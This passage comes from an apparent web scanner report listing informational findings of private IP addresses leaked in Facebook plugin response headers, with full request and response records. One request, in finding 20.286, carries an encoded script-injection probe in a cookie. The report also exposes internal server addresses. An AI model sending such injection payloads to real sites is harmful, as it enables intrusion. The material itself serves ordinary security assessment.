Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.77.77
X-Cnection: close
Date: Thu, 05 May 2011 01:18:01 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.283. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.111.114

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.111.114
X-Cnection: close
Date: Thu, 05 May 2011 01:06:55 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.284. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.69.106

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.69.106
X-Cnection: close
Date: Thu, 05 May 2011 01:13:48 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.285. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.194.46

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.194.46
X-Cnection: close
Date: Thu, 05 May 2011 01:29:12 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.286. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.149.49

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.49
Connection: close
Date: Thu, 05 May 2011 11:40:14 GMT
Content-Length: 7573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.287. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.72.53

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.72.53
X-Cnection: close
Date: Thu, 05 May 2011 01:40:23 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.288. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.134.126

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.134.126
X-Cnection: close
Date: Thu, 05 May 2011 01:08:17 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.289. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.57.55

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.57.55
X-Cnection: close
Date: Thu, 05 May 2011 01:50:07 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.290. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.105.115

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.105.115
X-Cnection: close
Date: Thu, 05 May 2011 01:59:46 GMT
Content-Length: 11986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.291. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.246.69

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.246.69
X-Cnection: close
Date: Thu, 05 May 2011 01:44:32 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.292. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.97.77

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.97.77
X-Cnection: close
Date: Thu, 05 May 2011 01:48:44 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.293. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.149.35

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
X-Cnection: close
Date: Thu, 05 May 2011 02:15:04 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.294. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.201.43

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.201.43
X-Cnection: close
Date: Thu, 05 May 2011 01:25:04 GMT
Content-Length: 11986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.295. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.155.32

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.155.32
X-Cnection: close
Date: Thu, 05 May 2011 01:22:17 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.296. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.106.131

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.106.131
X-Cnection: close
Date: Thu, 05 May 2011 02:04:00 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.297. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.65.49

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.65.49
X-Cnection: close
Date: Thu, 05 May 2011 01:05:31 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.298. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.179.40

Request

